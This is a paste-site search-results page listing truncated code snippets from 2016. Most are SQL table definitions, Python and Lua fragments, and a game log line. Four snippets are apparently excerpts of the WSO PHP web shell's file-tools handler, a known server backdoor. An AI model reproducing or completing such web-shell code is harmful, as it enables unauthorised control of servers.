42.7K results in 817 ms
9 years ago · Nov 20, 2016, 08:10 PM
USE `mydb` ; -- ----------------------------------------------------- -- Table `mydb`.`country` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `mydb`.`country` ( `country_id` INT NOT
9 years ago · Nov 20, 2016, 08:08 PM
cur.execute('DROP TABLE IF EXISTS firma;') cur.execute(""" CREATE TABLE IF NOT EXISTS firma ( id INTEGER PRIMARY KEY ASC, nazwa varchar(250) NOT NULL, NIP varchar(250) NOT NULL, adres varchar(250) DEFAULT '' )""")
9 years ago · Nov 20, 2016, 07:52 PM
MY_USER, MY_DATABASE, MY_PASSWORD); mysql_query(MySqlConnection, "CREATE TABLE IF NOT EXISTS `whitelist` (`ID` INT(10) PRIMARY
9 years ago · Nov 20, 2016, 07:42 PM
name) in the symbol table. -> If the lexeme is not found, install the new
9 years ago · Nov 20, 2016, 06:04 PM
Toote_kategooria_omamine" CASCADE ; DROP TABLE IF EXISTS "Toote_seisundi_liik" CASCADE ; CREATE TABLE "Amet" ( "amet_kood" smallint NOT NULL, "nimetus" varchar(50) NOT
9 years ago · Nov 20, 2016, 05:28 PM
Struttura della tabella `confmiele` -- CREATE TABLE IF NOT EXISTS `confmiele` ( `idconf` int(11) NOT
9 years ago · Nov 20, 2016, 04:22 PM
local canType = true if not properties.grantPrint and properties.refusePrint then local canTypeKeys = {} if type(properties.refusePrint) == "table" then for _, v in
9 years ago · Nov 20, 2016, 04:04 PM
CREATE TABLE IF NOT EXISTS `document` ( `intId` int(11) NOT
9 years ago · Nov 20, 2016, 04:02 PM
IF EXISTS firma;") cur.execute(""" CREATE TABLE IF NOT EXISTS firma ( id INTEGER PRIMARY
9 years ago · Nov 20, 2016, 03:58 PM
for `auctionhouse` -- ---------------------------- DROP TABLE IF EXISTS `auctionhouse`; CREATE TABLE `auctionhouse` ( `id` int(12) NOT NULL AUTO_INCREMENT, `item` varchar(32)
9 years ago · Nov 20, 2016, 03:26 PM
ConnectSQL( "Data.sqlite" ); QuerySQL( database, "CREATE TABLE IF NOT EXISTS Banned( ban_nick TEXT, ban_ip
9 years ago · Nov 20, 2016, 02:42 PM
the script: drop database if exists Cookbook; create database Cookbook; connect Cookbook; create table Recipe (id INT NOT
9 years ago · Nov 20, 2016, 02:20 PM
Language (DDL) */ CREATE SCHEMA IF NOT EXISTS demonstration; USE demonstration; CREATE TABLE User ( userName VARCHAR(48) NOT
9 years ago · Nov 20, 2016, 01:54 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Nov 20, 2016, 01:22 PM
16:13:09] [Client thread/WARN] [EnderIO]: Not adding supplied recipe as a recipe already exists for the input: 1xitem.coal@0
9 years ago · Nov 20, 2016, 01:04 PM
for table `person` -- DROP TABLE IF EXISTS `person`; /*!40101 SET @saved_cs_client
9 years ago · Nov 20, 2016, 12:30 PM
class="container-fluid"><span class="label label-default">Dosya Araclari</span><br>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Nov 20, 2016, 12:20 PM
class="container-fluid"><span class="label label-default">Dosya Araclari</span><br>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Nov 20, 2016, 11:50 AM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
9 years ago · Nov 20, 2016, 10:06 AM
class="container-fluid"><span class="label label-default">File tools</span><br>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
Total pages: 2134